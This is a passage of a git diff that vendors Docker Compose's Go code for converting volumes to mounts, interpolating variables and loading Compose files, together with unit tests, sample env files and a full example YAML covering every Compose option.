[]mount.Mount + + for _, volumeSpec := range serviceVolumes { + mount, err := convertVolumeToMount(volumeSpec, stackVolumes, namespace) + if err != nil { + return nil, err + } + mounts = append(mounts, mount) + } + return mounts, nil +} + +func convertVolumeToMount(volumeSpec string, stackVolumes volumes, namespace Namespace) (mount.Mount, error) { + var source, target string + var mode []string + + // TODO: split Windows path mappings properly + parts := strings.SplitN(volumeSpec, ":", 3) + + for _, part := range parts { + if strings.TrimSpace(part) == "" { + return mount.Mount{}, fmt.Errorf("invalid volume: %s", volumeSpec) + } + } + + switch len(parts) { + case 3: + source = parts[0] + target = parts[1] + mode = strings.Split(parts[2], ",") + case 2: + source = parts[0] + target = parts[1] + case 1: + target = parts[0] + } + + if source == "" { + // Anonymous volume + return mount.Mount{ + Type: mount.TypeVolume, + Target: target, + }, nil + } + + // TODO: catch Windows paths here + if strings.HasPrefix(source, "/") { + return mount.Mount{ + Type: mount.TypeBind, + Source: source, + Target: target, + ReadOnly: isReadOnly(mode), + BindOptions: getBindOptions(mode), + }, nil + } + + stackVolume, exists := stackVolumes[source] + if !exists { + return mount.Mount{}, fmt.Errorf("undefined volume: %s", source) + } + + var volumeOptions *mount.VolumeOptions + if stackVolume.External.Name != "" { + source = stackVolume.External.Name + } else { + volumeOptions = &mount.VolumeOptions{ + Labels: AddStackLabel(namespace, stackVolume.Labels), + NoCopy: isNoCopy(mode), + } + + if stackVolume.Driver != "" { + volumeOptions.DriverConfig = &mount.Driver{ + Name: stackVolume.Driver, + Options: stackVolume.DriverOpts, + } + } + source = namespace.Scope(source) + } + return mount.Mount{ + Type: mount.TypeVolume, + Source: source, + Target: target, + ReadOnly: isReadOnly(mode), + VolumeOptions: volumeOptions, + }, nil +} + +func modeHas(mode []string, field string) bool { + for _, 
item := range mode { + if item == field { + return true + } + } + return false +} + +func isReadOnly(mode []string) bool { + return modeHas(mode, "ro") +} + +func isNoCopy(mode []string) bool { + return modeHas(mode, "nocopy") +} + +func getBindOptions(mode []string) *mount.BindOptions { + for _, item := range mode { + for _, propagation := range mount.Propagations { + if mount.Propagation(item) == propagation { + return &mount.BindOptions{Propagation: mount.Propagation(item)} + } + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go b/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go new file mode 100644 index 0000000000..113ab1e1b6 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go @@ -0,0 +1,133 @@ +package convert + +import ( + "testing" + + "github.com/docker/docker/api/types/mount" + composetypes "github.com/docker/docker/cli/compose/types" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestIsReadOnly(t *testing.T) { + assert.Equal(t, isReadOnly([]string{"foo", "bar", "ro"}), true) + assert.Equal(t, isReadOnly([]string{"ro"}), true) + assert.Equal(t, isReadOnly([]string{}), false) + assert.Equal(t, isReadOnly([]string{"foo", "rw"}), false) + assert.Equal(t, isReadOnly([]string{"foo"}), false) +} + +func TestIsNoCopy(t *testing.T) { + assert.Equal(t, isNoCopy([]string{"foo", "bar", "nocopy"}), true) + assert.Equal(t, isNoCopy([]string{"nocopy"}), true) + assert.Equal(t, isNoCopy([]string{}), false) + assert.Equal(t, isNoCopy([]string{"foo", "rw"}), false) +} + +func TestGetBindOptions(t *testing.T) { + opts := getBindOptions([]string{"slave"}) + expected := mount.BindOptions{Propagation: mount.PropagationSlave} + assert.Equal(t, *opts, expected) +} + +func TestGetBindOptionsNone(t *testing.T) { + opts := getBindOptions([]string{"ro"}) + assert.Equal(t, opts, (*mount.BindOptions)(nil)) +} + +func TestConvertVolumeToMountNamedVolume(t *testing.T) { 
+ stackVolumes := volumes{ + "normal": composetypes.VolumeConfig{ + Driver: "glusterfs", + DriverOpts: map[string]string{ + "opt": "value", + }, + Labels: map[string]string{ + "something": "labeled", + }, + }, + } + namespace := NewNamespace("foo") + expected := mount.Mount{ + Type: mount.TypeVolume, + Source: "foo_normal", + Target: "/foo", + ReadOnly: true, + VolumeOptions: &mount.VolumeOptions{ + Labels: map[string]string{ + LabelNamespace: "foo", + "something": "labeled", + }, + DriverConfig: &mount.Driver{ + Name: "glusterfs", + Options: map[string]string{ + "opt": "value", + }, + }, + }, + } + mount, err := convertVolumeToMount("normal:/foo:ro", stackVolumes, namespace) + assert.NilError(t, err) + assert.DeepEqual(t, mount, expected) +} + +func TestConvertVolumeToMountNamedVolumeExternal(t *testing.T) { + stackVolumes := volumes{ + "outside": composetypes.VolumeConfig{ + External: composetypes.External{ + External: true, + Name: "special", + }, + }, + } + namespace := NewNamespace("foo") + expected := mount.Mount{ + Type: mount.TypeVolume, + Source: "special", + Target: "/foo", + } + mount, err := convertVolumeToMount("outside:/foo", stackVolumes, namespace) + assert.NilError(t, err) + assert.DeepEqual(t, mount, expected) +} + +func TestConvertVolumeToMountBind(t *testing.T) { + stackVolumes := volumes{} + namespace := NewNamespace("foo") + expected := mount.Mount{ + Type: mount.TypeBind, + Source: "/bar", + Target: "/foo", + ReadOnly: true, + BindOptions: &mount.BindOptions{Propagation: mount.PropagationShared}, + } + mount, err := convertVolumeToMount("/bar:/foo:ro,shared", stackVolumes, namespace) + assert.NilError(t, err) + assert.DeepEqual(t, mount, expected) +} + +func TestConvertVolumeToMountVolumeDoesNotExist(t *testing.T) { + namespace := NewNamespace("foo") + _, err := convertVolumeToMount("unknown:/foo:ro", volumes{}, namespace) + assert.Error(t, err, "undefined volume: unknown") +} + +func TestConvertVolumeToMountAnonymousVolume(t *testing.T) { + 
stackVolumes := map[string]composetypes.VolumeConfig{} + namespace := NewNamespace("foo") + expected := mount.Mount{ + Type: mount.TypeVolume, + Target: "/foo/bar", + } + mnt, err := convertVolumeToMount("/foo/bar", stackVolumes, namespace) + assert.NilError(t, err) + assert.DeepEqual(t, mnt, expected) +} + +func TestConvertVolumeToMountInvalidFormat(t *testing.T) { + namespace := NewNamespace("foo") + invalids := []string{"::", "::cc", ":bb:", "aa::", "aa::cc", "aa:bb:", " : : ", " : :cc", " :bb: ", "aa: : ", "aa: :cc", "aa:bb: "} + for _, vol := range invalids { + _, err := convertVolumeToMount(vol, map[string]composetypes.VolumeConfig{}, namespace) + assert.Error(t, err, "invalid volume: "+vol) + } +} diff --git a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go new file mode 100644 index 0000000000..734f28ec9d --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go @@ -0,0 +1,90 @@ +package interpolation + +import ( + "fmt" + + "github.com/docker/docker/cli/compose/template" + "github.com/docker/docker/cli/compose/types" +) + +// Interpolate replaces variables in a string with the values from a mapping +func Interpolate(config types.Dict, section string, mapping template.Mapping) (types.Dict, error) { + out := types.Dict{} + + for name, item := range config { + if item == nil { + out[name] = nil + continue + } + interpolatedItem, err := interpolateSectionItem(name, item.(types.Dict), section, mapping) + if err != nil { + return nil, err + } + out[name] = interpolatedItem + } + + return out, nil +} + +func interpolateSectionItem( + name string, + item types.Dict, + section string, + mapping template.Mapping, +) (types.Dict, error) { + + out := types.Dict{} + + for key, value := range item { + interpolatedValue, err := recursiveInterpolate(value, mapping) + if err != nil { + return nil, fmt.Errorf( + "Invalid interpolation 
format for %#v option in %s %#v: %#v", + key, section, name, err.Template, + ) + } + out[key] = interpolatedValue + } + + return out, nil + +} + +func recursiveInterpolate( + value interface{}, + mapping template.Mapping, +) (interface{}, *template.InvalidTemplateError) { + + switch value := value.(type) { + + case string: + return template.Substitute(value, mapping) + + case types.Dict: + out := types.Dict{} + for key, elem := range value { + interpolatedElem, err := recursiveInterpolate(elem, mapping) + if err != nil { + return nil, err + } + out[key] = interpolatedElem + } + return out, nil + + case []interface{}: + out := make([]interface{}, len(value)) + for i, elem := range value { + interpolatedElem, err := recursiveInterpolate(elem, mapping) + if err != nil { + return nil, err + } + out[i] = interpolatedElem + } + return out, nil + + default: + return value, nil + + } + +} diff --git a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go new file mode 100644 index 0000000000..c3921701b3 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go @@ -0,0 +1,59 @@ +package interpolation + +import ( + "testing" + + "github.com/stretchr/testify/assert" + + "github.com/docker/docker/cli/compose/types" +) + +var defaults = map[string]string{ + "USER": "jenny", + "FOO": "bar", +} + +func defaultMapping(name string) (string, bool) { + val, ok := defaults[name] + return val, ok +} + +func TestInterpolate(t *testing.T) { + services := types.Dict{ + "servicea": types.Dict{ + "image": "example:${USER}", + "volumes": []interface{}{"$FOO:/target"}, + "logging": types.Dict{ + "driver": "${FOO}", + "options": types.Dict{ + "user": "$USER", + }, + }, + }, + } + expected := types.Dict{ + "servicea": types.Dict{ + "image": "example:jenny", + "volumes": []interface{}{"bar:/target"}, + "logging": types.Dict{ + "driver": "bar", + 
"options": types.Dict{ + "user": "jenny", + }, + }, + }, + } + result, err := Interpolate(services, "service", defaultMapping) + assert.NoError(t, err) + assert.Equal(t, expected, result) +} + +func TestInvalidInterpolation(t *testing.T) { + services := types.Dict{ + "servicea": types.Dict{ + "image": "${", + }, + } + _, err := Interpolate(services, "service", defaultMapping) + assert.EqualError(t, err, `Invalid interpolation format for "image" option in service "servicea": "${"`) +} diff --git a/vendor/github.com/docker/docker/cli/compose/loader/example1.env b/vendor/github.com/docker/docker/cli/compose/loader/example1.env new file mode 100644 index 0000000000..3e7a059613 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/loader/example1.env @@ -0,0 +1,8 @@ +# passed through +FOO=1 + +# overridden in example2.env +BAR=1 + +# overridden in full-example.yml +BAZ=1 diff --git a/vendor/github.com/docker/docker/cli/compose/loader/example2.env b/vendor/github.com/docker/docker/cli/compose/loader/example2.env new file mode 100644 index 0000000000..0920d5ab05 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/loader/example2.env @@ -0,0 +1 @@ +BAR=2 diff --git a/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml b/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml new file mode 100644 index 0000000000..fb5686a380 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml @@ -0,0 +1,287 @@ +version: "3" + +services: + foo: + cap_add: + - ALL + + cap_drop: + - NET_ADMIN + - SYS_ADMIN + + cgroup_parent: m-executor-abcd + + # String or list + command: bundle exec thin -p 3000 + # command: ["bundle", "exec", "thin", "-p", "3000"] + + container_name: my-web-container + + depends_on: + - db + - redis + + deploy: + mode: replicated + replicas: 6 + labels: [FOO=BAR] + update_config: + parallelism: 3 + delay: 10s + failure_action: continue + monitor: 60s + max_failure_ratio: 0.3 + resources: + 
limits: + cpus: '0.001' + memory: 50M + reservations: + cpus: '0.0001' + memory: 20M + restart_policy: + condition: on_failure + delay: 5s + max_attempts: 3 + window: 120s + placement: + constraints: [node=foo] + + devices: + - "/dev/ttyUSB0:/dev/ttyUSB0" + + # String or list + # dns: 8.8.8.8 + dns: + - 8.8.8.8 + - 9.9.9.9 + + # String or list + # dns_search: example.com + dns_search: + - dc1.example.com + - dc2.example.com + + domainname: foo.com + + # String or list + # entrypoint: /code/entrypoint.sh -p 3000 + entrypoint: ["/code/entrypoint.sh", "-p", "3000"] + + # String or list + # env_file: .env + env_file: + - ./example1.env + - ./example2.env + + # Mapping or list + # Mapping values can be strings, numbers or null + # Booleans are not allowed - must be quoted + environment: + RACK_ENV: development + SHOW: 'true' + SESSION_SECRET: + BAZ: 3 + # environment: + # - RACK_ENV=development + # - SHOW=true + # - SESSION_SECRET + + # Items can be strings or numbers + expose: + - "3000" + - 8000 + + external_links: + - redis_1 + - project_db_1:mysql + - project_db_1:postgresql + + # Mapping or list + # Mapping values must be strings + # extra_hosts: + # somehost: "162.242.195.82" + # otherhost: "50.31.209.229" + extra_hosts: + - "somehost:162.242.195.82" + - "otherhost:50.31.209.229" + + hostname: foo + + healthcheck: + test: echo "hello world" + interval: 10s + timeout: 1s + retries: 5 + + # Any valid image reference - repo, tag, id, sha + image: redis + # image: ubuntu:14.04 + # image: tutum/influxdb + # image: example-registry.com:4000/postgresql + # image: a4bc65fd + # image: busybox@sha256:38a203e1986cf79639cfb9b2e1d6e773de84002feea2d4eb006b52004ee8502d + + ipc: host + + # Mapping or list + # Mapping values can be strings, numbers or null + labels: + com.example.description: "Accounting webapp" + com.example.number: 42 + com.example.empty-label: + # labels: + # - "com.example.description=Accounting webapp" + # - "com.example.number=42" + # - 
"com.example.empty-label" + + links: + - db + - db:database + - redis + + logging: + driver: syslog + options: + syslog-address: "tcp://192.168.0.42:123" + + mac_address: 02:42:ac:11:65:43 + + # network_mode: "bridge" + # network_mode: "host" + # network_mode: "none" + # Use the network mode of an arbitrary container from another service + # network_mode: "service:db" + # Use the network mode of another container, specified by name or id + # network_mode: "container:some-container" + network_mode: "container:0cfeab0f748b9a743dc3da582046357c6ef497631c1a016d28d2bf9b4f899f7b" + + networks: + some-network: + aliases: + - alias1 + - alias3 + other-network: + ipv4_address: 172.16.238.10 + ipv6_address: 2001:3984:3989::10 + other-other-network: + + pid: "host" + + ports: + - 3000 + - "3000-3005" + - "8000:8000" + - "9090-9091:8080-8081" + - "49100:22" + - "127.0.0.1:8001:8001" + - "127.0.0.1:5000-5010:5000-5010" + + privileged: true + + read_only: true + + restart: always + + security_opt: + - label=level:s0:c100,c200 + - label=type:svirt_apache_t + + stdin_open: true + + stop_grace_period: 20s + + stop_signal: SIGUSR1 + + # String or list + # tmpfs: /run + tmpfs: + - /run + - /tmp + + tty: true + + ulimits: + # Single number or mapping with soft + hard limits + nproc: 65535 + nofile: + soft: 20000 + hard: 40000 + + user: someone + + volumes: + # Just specify a path and let the Engine create a volume + - /var/lib/mysql + # Specify an absolute path mapping + - /opt/data:/var/lib/mysql + # Path on the host, relative to the Compose file + - .:/code + - ./static:/var/www/html + # User-relative path + - ~/configs:/etc/configs/:ro + # Named volume + - datavolume:/var/lib/mysql + + working_dir: /code + +networks: + # Entries can be null, which specifies simply that a network + # called "{project name}_some-network" should be created and + # use the default driver + some-network: + + other-network: + driver: overlay + + driver_opts: + # Values can be strings or numbers + foo: 
"bar" + baz: 1 + + ipam: + driver: overlay + # driver_opts: + # # Values can be strings or numbers + # com.docker.network.enable_ipv6: "true" + # com.docker.network.numeric_value: 1 + config: + - subnet: 172.16.238.0/24 + # gateway: 172.16.238.1 + - subnet: 2001:3984:3989::/64 + # gateway: 2001:3984:3989::1 + + external-network: + # Specifies that a pre-existing network called "external-network" + # can be referred to within this file as "external-network" + external: true + + other-external-network: + # Specifies that a pre-existing network called "my-cool-network" + # can be referred to within this file as "other-external-network" + external: + name: my-cool-network + +volumes: + # Entries can be null, which specifies simply that a volume + # called "{project name}_some-volume" should be created and + # use the default driver + some-volume: + + other-volume: + driver: flocker + + driver_opts: + # Values can be strings or numbers + foo: "bar" + baz: 1 + + external-volume: + # Specifies that a pre-existing volume called "external-volume" + # can be referred to within this file as "external-volume" + external: true + + other-external-volume: + # Specifies that a pre-existing volume called "my-cool-volume" + # can be referred to within this file as "other-external-volume" + external: + name: my-cool-volume diff --git a/vendor/github.com/docker/docker/cli/compose/loader/loader.go b/vendor/github.com/docker/docker/cli/compose/loader/loader.go new file mode 100644 index 0000000000..39f69a03ff --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/loader/loader.go @@ -0,0 +1,653 @@ +package loader + +import ( + "fmt" + "os" + "path" + "reflect" + "regexp" + "sort" + "strings" + + "github.com/docker/docker/cli/compose/interpolation" + "github.com/docker/docker/cli/compose/schema" + "github.com/docker/docker/cli/compose/types" + "github.com/docker/docker/runconfig/opts" + units "github.com/docker/go-units" + shellwords "github.com/mattn/go-shellwords" + 
"github.com/mitchellh/mapstructure" + yaml "gopkg.in/yaml.v2" +) + +var ( + fieldNameRegexp = regexp.MustCompile("[A-Z][a-z0-9]+") +) + +// ParseYAML reads the bytes from a file, parses the bytes into a mapping +// structure, and returns it. +func ParseYAML(source []byte) (types.Dict, error) { + var cfg interface{} + if err := yaml.Unmarshal(source, &cfg); err != nil { + return nil, err + } + cfgMap, ok := cfg.(map[interface{}]interface{}) + if !ok { + return nil, fmt.Errorf("Top-level object must be a mapping") + } + converted, err := convertToStringKeysRecursive(cfgMap, "") + if err != nil { + return nil, err + } + return converted.(types.Dict), nil +} + +// Load reads a ConfigDetails and returns a fully loaded configuration +func Load(configDetails types.ConfigDetails) (*types.Config, error) { + if len(configDetails.ConfigFiles) < 1 { + return nil, fmt.Errorf("No files specified") + } + if len(configDetails.ConfigFiles) > 1 { + return nil, fmt.Errorf("Multiple files are not yet supported") + } + + configDict := getConfigDict(configDetails) + + if services, ok := configDict["services"]; ok { + if servicesDict, ok := services.(types.Dict); ok { + forbidden := getProperties(servicesDict, types.ForbiddenProperties) + + if len(forbidden) > 0 { + return nil, &ForbiddenPropertiesError{Properties: forbidden} + } + } + } + + if err := schema.Validate(configDict, schema.Version(configDict)); err != nil { + return nil, err + } + + cfg := types.Config{} + if services, ok := configDict["services"]; ok { + servicesConfig, err := interpolation.Interpolate(services.(types.Dict), "service", os.LookupEnv) + if err != nil { + return nil, err + } + + servicesList, err := loadServices(servicesConfig, configDetails.WorkingDir) + if err != nil { + return nil, err + } + + cfg.Services = servicesList + } + + if networks, ok := configDict["networks"]; ok { + networksConfig, err := interpolation.Interpolate(networks.(types.Dict), "network", os.LookupEnv) + if err != nil { + return nil, 
// sortedKeys returns the keys of set in ascending lexical order.
// An empty set yields a nil slice.
func sortedKeys(set map[string]bool) []string {
	var out []string
	for name := range set {
		out = append(out, name)
	}
	sort.Strings(out)
	return out
}
+func GetDeprecatedProperties(configDetails types.ConfigDetails) map[string]string { + return getProperties(getServices(getConfigDict(configDetails)), types.DeprecatedProperties) +} + +func getProperties(services types.Dict, propertyMap map[string]string) map[string]string { + output := map[string]string{} + + for _, service := range services { + if serviceDict, ok := service.(types.Dict); ok { + for property, description := range propertyMap { + if _, isSet := serviceDict[property]; isSet { + output[property] = description + } + } + } + } + + return output +} + +// ForbiddenPropertiesError is returned when there are properties in the Compose +// file that are forbidden. +type ForbiddenPropertiesError struct { + Properties map[string]string +} + +func (e *ForbiddenPropertiesError) Error() string { + return "Configuration contains forbidden properties" +} + +// TODO: resolve multiple files into a single config +func getConfigDict(configDetails types.ConfigDetails) types.Dict { + return configDetails.ConfigFiles[0].Config +} + +func getServices(configDict types.Dict) types.Dict { + if services, ok := configDict["services"]; ok { + if servicesDict, ok := services.(types.Dict); ok { + return servicesDict + } + } + + return types.Dict{} +} + +func transform(source map[string]interface{}, target interface{}) error { + data := mapstructure.Metadata{} + config := &mapstructure.DecoderConfig{ + DecodeHook: mapstructure.ComposeDecodeHookFunc( + transformHook, + mapstructure.StringToTimeDurationHookFunc()), + Result: target, + Metadata: &data, + } + decoder, err := mapstructure.NewDecoder(config) + if err != nil { + return err + } + err = decoder.Decode(source) + // TODO: log unused keys + return err +} + +func transformHook( + source reflect.Type, + target reflect.Type, + data interface{}, +) (interface{}, error) { + switch target { + case reflect.TypeOf(types.External{}): + return transformExternal(data) + case reflect.TypeOf(make(map[string]string, 0)): + return 
transformMapStringString(source, target, data) + case reflect.TypeOf(types.UlimitsConfig{}): + return transformUlimits(data) + case reflect.TypeOf(types.UnitBytes(0)): + return loadSize(data) + case reflect.TypeOf(types.ServiceSecretConfig{}): + return transformServiceSecret(data) + } + switch target.Kind() { + case reflect.Struct: + return transformStruct(source, target, data) + } + return data, nil +} + +// keys needs to be converted to strings for jsonschema +// TODO: don't use types.Dict +func convertToStringKeysRecursive(value interface{}, keyPrefix string) (interface{}, error) { + if mapping, ok := value.(map[interface{}]interface{}); ok { + dict := make(types.Dict) + for key, entry := range mapping { + str, ok := key.(string) + if !ok { + var location string + if keyPrefix == "" { + location = "at top level" + } else { + location = fmt.Sprintf("in %s", keyPrefix) + } + return nil, fmt.Errorf("Non-string key %s: %#v", location, key) + } + var newKeyPrefix string + if keyPrefix == "" { + newKeyPrefix = str + } else { + newKeyPrefix = fmt.Sprintf("%s.%s", keyPrefix, str) + } + convertedEntry, err := convertToStringKeysRecursive(entry, newKeyPrefix) + if err != nil { + return nil, err + } + dict[str] = convertedEntry + } + return dict, nil + } + if list, ok := value.([]interface{}); ok { + var convertedList []interface{} + for index, entry := range list { + newKeyPrefix := fmt.Sprintf("%s[%d]", keyPrefix, index) + convertedEntry, err := convertToStringKeysRecursive(entry, newKeyPrefix) + if err != nil { + return nil, err + } + convertedList = append(convertedList, convertedEntry) + } + return convertedList, nil + } + return value, nil +} + +func loadServices(servicesDict types.Dict, workingDir string) ([]types.ServiceConfig, error) { + var services []types.ServiceConfig + + for name, serviceDef := range servicesDict { + serviceConfig, err := loadService(name, serviceDef.(types.Dict), workingDir) + if err != nil { + return nil, err + } + services = 
append(services, *serviceConfig) + } + + return services, nil +} + +func loadService(name string, serviceDict types.Dict, workingDir string) (*types.ServiceConfig, error) { + serviceConfig := &types.ServiceConfig{} + if err := transform(serviceDict, serviceConfig); err != nil { + return nil, err + } + serviceConfig.Name = name + + if err := resolveEnvironment(serviceConfig, serviceDict, workingDir); err != nil { + return nil, err + } + + if err := resolveVolumePaths(serviceConfig.Volumes, workingDir); err != nil { + return nil, err + } + + return serviceConfig, nil +} + +func resolveEnvironment(serviceConfig *types.ServiceConfig, serviceDict types.Dict, workingDir string) error { + environment := make(map[string]string) + + if envFileVal, ok := serviceDict["env_file"]; ok { + envFiles := loadStringOrListOfStrings(envFileVal) + + var envVars []string + + for _, file := range envFiles { + filePath := absPath(workingDir, file) + fileVars, err := opts.ParseEnvFile(filePath) + if err != nil { + return err + } + envVars = append(envVars, fileVars...) 
// expandUser replaces a leading "~" with the value of $HOME, mimicking
// shell tilde expansion for volume paths. Paths without a leading "~"
// are returned unchanged.
// TODO: make this more robust — note that "~otheruser/x" is also
// rewritten with the current $HOME, which shells would not do.
func expandUser(path string) string {
	if !strings.HasPrefix(path, "~") {
		return path
	}
	return strings.Replace(path, "~", os.Getenv("HOME"), 1)
}
// absPath resolves filepath against workingDir; already-absolute paths
// are returned unchanged. It uses slash-separated semantics (package
// path, not path/filepath), matching how Compose files spell paths.
func absPath(workingDir string, filepath string) string {
	if !path.IsAbs(filepath) {
		return path.Join(workingDir, filepath)
	}
	return filepath
}
+ source reflect.Type, + target reflect.Type, + data interface{}, +) (interface{}, error) { + switch fieldTag { + case "": + return data, nil + case "healthcheck": + return loadHealthcheck(data) + case "list_or_dict_equals": + return loadMappingOrList(data, "="), nil + case "list_or_dict_colon": + return loadMappingOrList(data, ":"), nil + case "list_or_struct_map": + return loadListOrStructMap(data, target) + case "string_or_list": + return loadStringOrListOfStrings(data), nil + case "list_of_strings_or_numbers": + return loadListOfStringsOrNumbers(data), nil + case "shell_command": + return loadShellCommand(data) + case "size": + return loadSize(data) + case "-": + return nil, nil + } + return data, nil +} + +func transformExternal(data interface{}) (interface{}, error) { + switch value := data.(type) { + case bool: + return map[string]interface{}{"external": value}, nil + case types.Dict: + return map[string]interface{}{"external": true, "name": value["name"]}, nil + case map[string]interface{}: + return map[string]interface{}{"external": true, "name": value["name"]}, nil + default: + return data, fmt.Errorf("invalid type %T for external", value) + } +} + +func transformServiceSecret(data interface{}) (interface{}, error) { + switch value := data.(type) { + case string: + return map[string]interface{}{"source": value}, nil + case types.Dict: + return data, nil + case map[string]interface{}: + return data, nil + default: + return data, fmt.Errorf("invalid type %T for external", value) + } + +} + +func toYAMLName(name string) string { + nameParts := fieldNameRegexp.FindAllString(name, -1) + for i, p := range nameParts { + nameParts[i] = strings.ToLower(p) + } + return strings.Join(nameParts, "_") +} + +func loadListOrStructMap(value interface{}, target reflect.Type) (interface{}, error) { + if list, ok := value.([]interface{}); ok { + mapValue := map[interface{}]interface{}{} + for _, name := range list { + mapValue[name] = nil + } + return mapValue, nil + } + + 
// loadStringOrListOfStrings accepts either a single string or a YAML
// list of scalars and always returns a []string, stringifying each
// list item with fmt.Sprint. A non-list, non-string value panics via
// the type assertion, as before.
func loadStringOrListOfStrings(value interface{}) []string {
	list, ok := value.([]interface{})
	if !ok {
		return []string{value.(string)}
	}
	out := make([]string, len(list))
	for i, item := range list {
		out[i] = fmt.Sprint(item)
	}
	return out
}
a/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go b/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go new file mode 100644 index 0000000000..f7fee89ede --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go @@ -0,0 +1,800 @@ +package loader + +import ( + "fmt" + "io/ioutil" + "os" + "sort" + "testing" + "time" + + "github.com/docker/docker/cli/compose/types" + "github.com/stretchr/testify/assert" +) + +func buildConfigDetails(source types.Dict) types.ConfigDetails { + workingDir, err := os.Getwd() + if err != nil { + panic(err) + } + + return types.ConfigDetails{ + WorkingDir: workingDir, + ConfigFiles: []types.ConfigFile{ + {Filename: "filename.yml", Config: source}, + }, + Environment: nil, + } +} + +var sampleYAML = ` +version: "3" +services: + foo: + image: busybox + networks: + with_me: + bar: + image: busybox + environment: + - FOO=1 + networks: + - with_ipam +volumes: + hello: + driver: default + driver_opts: + beep: boop +networks: + default: + driver: bridge + driver_opts: + beep: boop + with_ipam: + ipam: + driver: default + config: + - subnet: 172.28.0.0/16 +` + +var sampleDict = types.Dict{ + "version": "3", + "services": types.Dict{ + "foo": types.Dict{ + "image": "busybox", + "networks": types.Dict{"with_me": nil}, + }, + "bar": types.Dict{ + "image": "busybox", + "environment": []interface{}{"FOO=1"}, + "networks": []interface{}{"with_ipam"}, + }, + }, + "volumes": types.Dict{ + "hello": types.Dict{ + "driver": "default", + "driver_opts": types.Dict{ + "beep": "boop", + }, + }, + }, + "networks": types.Dict{ + "default": types.Dict{ + "driver": "bridge", + "driver_opts": types.Dict{ + "beep": "boop", + }, + }, + "with_ipam": types.Dict{ + "ipam": types.Dict{ + "driver": "default", + "config": []interface{}{ + types.Dict{ + "subnet": "172.28.0.0/16", + }, + }, + }, + }, + }, +} + +var sampleConfig = types.Config{ + Services: []types.ServiceConfig{ + { + Name: "foo", + Image: "busybox", + 
Environment: map[string]string{}, + Networks: map[string]*types.ServiceNetworkConfig{ + "with_me": nil, + }, + }, + { + Name: "bar", + Image: "busybox", + Environment: map[string]string{"FOO": "1"}, + Networks: map[string]*types.ServiceNetworkConfig{ + "with_ipam": nil, + }, + }, + }, + Networks: map[string]types.NetworkConfig{ + "default": { + Driver: "bridge", + DriverOpts: map[string]string{ + "beep": "boop", + }, + }, + "with_ipam": { + Ipam: types.IPAMConfig{ + Driver: "default", + Config: []*types.IPAMPool{ + { + Subnet: "172.28.0.0/16", + }, + }, + }, + }, + }, + Volumes: map[string]types.VolumeConfig{ + "hello": { + Driver: "default", + DriverOpts: map[string]string{ + "beep": "boop", + }, + }, + }, +} + +func TestParseYAML(t *testing.T) { + dict, err := ParseYAML([]byte(sampleYAML)) + if !assert.NoError(t, err) { + return + } + assert.Equal(t, sampleDict, dict) +} + +func TestLoad(t *testing.T) { + actual, err := Load(buildConfigDetails(sampleDict)) + if !assert.NoError(t, err) { + return + } + assert.Equal(t, serviceSort(sampleConfig.Services), serviceSort(actual.Services)) + assert.Equal(t, sampleConfig.Networks, actual.Networks) + assert.Equal(t, sampleConfig.Volumes, actual.Volumes) +} + +func TestLoadV31(t *testing.T) { + actual, err := loadYAML(` +version: "3.1" +services: + foo: + image: busybox + secrets: [super] +secrets: + super: + external: true +`) + if !assert.NoError(t, err) { + return + } + assert.Equal(t, len(actual.Services), 1) + assert.Equal(t, len(actual.Secrets), 1) +} + +func TestParseAndLoad(t *testing.T) { + actual, err := loadYAML(sampleYAML) + if !assert.NoError(t, err) { + return + } + assert.Equal(t, serviceSort(sampleConfig.Services), serviceSort(actual.Services)) + assert.Equal(t, sampleConfig.Networks, actual.Networks) + assert.Equal(t, sampleConfig.Volumes, actual.Volumes) +} + +func TestInvalidTopLevelObjectType(t *testing.T) { + _, err := loadYAML("1") + assert.Error(t, err) + assert.Contains(t, err.Error(), "Top-level 
object must be a mapping") + + _, err = loadYAML("\"hello\"") + assert.Error(t, err) + assert.Contains(t, err.Error(), "Top-level object must be a mapping") + + _, err = loadYAML("[\"hello\"]") + assert.Error(t, err) + assert.Contains(t, err.Error(), "Top-level object must be a mapping") +} + +func TestNonStringKeys(t *testing.T) { + _, err := loadYAML(` +version: "3" +123: + foo: + image: busybox +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "Non-string key at top level: 123") + + _, err = loadYAML(` +version: "3" +services: + foo: + image: busybox + 123: + image: busybox +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "Non-string key in services: 123") + + _, err = loadYAML(` +version: "3" +services: + foo: + image: busybox +networks: + default: + ipam: + config: + - 123: oh dear +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "Non-string key in networks.default.ipam.config[0]: 123") + + _, err = loadYAML(` +version: "3" +services: + dict-env: + image: busybox + environment: + 1: FOO +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "Non-string key in services.dict-env.environment: 1") +} + +func TestSupportedVersion(t *testing.T) { + _, err := loadYAML(` +version: "3" +services: + foo: + image: busybox +`) + assert.NoError(t, err) + + _, err = loadYAML(` +version: "3.0" +services: + foo: + image: busybox +`) + assert.NoError(t, err) +} + +func TestUnsupportedVersion(t *testing.T) { + _, err := loadYAML(` +version: "2" +services: + foo: + image: busybox +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "version") + + _, err = loadYAML(` +version: "2.0" +services: + foo: + image: busybox +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "version") +} + +func 